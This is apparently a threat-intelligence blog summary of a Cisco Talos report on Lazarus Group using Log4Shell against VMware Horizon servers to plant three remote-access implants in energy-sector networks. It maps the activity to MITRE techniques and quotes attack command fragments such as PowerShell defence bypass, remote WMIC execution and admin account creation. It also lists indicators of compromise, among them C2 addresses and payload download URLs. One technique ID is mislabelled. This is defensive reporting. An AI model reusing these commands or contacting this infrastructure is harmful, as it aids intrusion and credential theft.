Threat Research

Lazarus and the tale of three RATs

Securonix

Cisco Talos reports Lazarus Group’s global campaign exploiting VMware Horizon vulnerabilities to gain long-term access to energy-sector targets, deploying VSingle, YamaBot, and the newly described MagicRAT implants. The activity shows post-exploitation, lateral movement, credential harvesting, and C2/payload infrastructure overlap with multiple U.S. and international advisories.

Keypoints

  • The Lazarus Group campaign uses the Log4Shell vulnerability on publicly facing VMware Horizon servers as the initial access vector.
  • Targets include energy providers globally, with victims in the United States, Canada and Japan.
  • Adversaries deployed three bespoke implants—VSingle, YamaBot, and MagicRAT—to achieve persistence, data exfiltration, and remote access.
  • Post-exploitation involves reconnaissance, credential harvesting, AD/Impacket-based lateral movement, and the creation of new admin accounts or services.
  • Defense evasion includes disabling Windows Defender, modifying registry/run keys, and startup persistence with scheduled tasks and services.
  • There is overlap with CISA advisories and other reports (AhnLab/Kaspersky/JPCERT) regarding similar IOCs and TTPs and shared infrastructure.
  • The operation demonstrates varied human-operated command activity, infrastructure reuse, and multiple implants deployed in sequence to maintain access.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – The campaign uses the Log4Shell vulnerability on VMware Horizon public-facing servers as the initial attack vector. Quote: ‘the exploitation of the Log4Shell vulnerability on VmWare Horizon public-facing servers as the initial attack vector [T1190].’
  • [T1021] Remote Services – Lateral movement via remote process creation (WMIC) to execute commands on remote endpoints. Quote: ‘WMIC /node:<Computer_Name> process call create “powershell.exe …”‘
  • [T1059.001] PowerShell – Extensive use of PowerShell to download, bypass defenses, and execute payloads. Quote: ‘powershell -exec bypass -Command Get-MpPreference’ and similar commands
  • [T1082] System Information Discovery – Reconnaissance commands to gather system configuration. Quote: ‘System Information Discovery [T1082]’
  • [T1083] File and Directory Discovery – Commands to enumerate files and directories on the host. Quote: ‘dir c:”Program Files (x86)’ and related entries
  • [T1562.001] Impair Defenses – Disabling or bypassing security tools (e.g., Windows Defender). Quote: ‘Deactivate Windows Defender components [T1562]… Get-MpPreference’
  • [T1547.001] Run Keys / Startup Folder – Persistence via registry/run keys and startup folders. Quote: ‘Startup folders’ and ‘reg add … Run’ entries
  • [T1543.003] Create/Modify System Process – Create auto-start services to persist implants. Quote: ‘persisted on the endpoint by creating an auto-start service’
  • [T1053.005] Scheduled Task – Persistence via scheduled tasks (logon/start). Quote: ‘Scheduled task triggered at logon [T1053/005]’
  • [T1005] Ingress Tool Transfer – Downloading payloads from remote locations before execution. Quote: ‘DownloadFile(…)’ commands
  • [T1003.003] OS Credential Dumping: NTDS – Exfiltration of AD data via NTDS.dit. Quote: ‘OS Credential Dumping: NTDS [T1003/003]’
  • [T1033] Account Discovery – Discovery of user accounts on the domain. Quote: ‘User Discovery [T1033]’
  • [T1136] Create Account – Adding new local/admin accounts. Quote: ‘net user /add’
  • [T1090] Proxy – Use of SOCKS proxy (3proxy) to pivot via a proxy. Quote: ‘Proxy [T1090]’
  • [T1560] Archive Collected Data – Compressing and exfiltrating data. Quote: ‘Archive Collected Data [T1560]’
  • [T1070] Indicator Removal on Host – Cleaning up traces and logs. Quote: ‘purge Windows Event Logs [T1070]’

Indicators of Compromise

  • [IP] 104.155.149.103 – Hosting/payload infrastructure used for C2 and file delivery
  • [IP] 84.38.133.145 – Hosting/C2 infrastructure referenced in IOCs
  • [Hash] 586F30907C3849C363145BFDCDABE3E2E4688CBD5688FF968E984B201B474730 – VSingle
  • [Hash] 226086b5959eb96bd30dec0ffcbf0f09186cd11721507f416f1c39901addafb – YamaBot
  • [Hash] 8ce219552e235dcaf1c694be122d6339ed4ff8df70bf358cd165e6eb487ccfc5 – MagicRAT
  • [Hash] 2963a90eb9e499258a67d8231a3124021b42e6c70dacd3aab36746e51e3ce37e – 3Proxy
  • [File] ntds.dit – OS credential dump data exfiltration context
  • [File] zsam.tmp – part of NTDS dump workflow
  • [URL] http://104.155.149.103/mi64.tmp – payload download URL
  • [URL] http://104.155.149.103/mm.rar – payload archive URL

Read more: https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint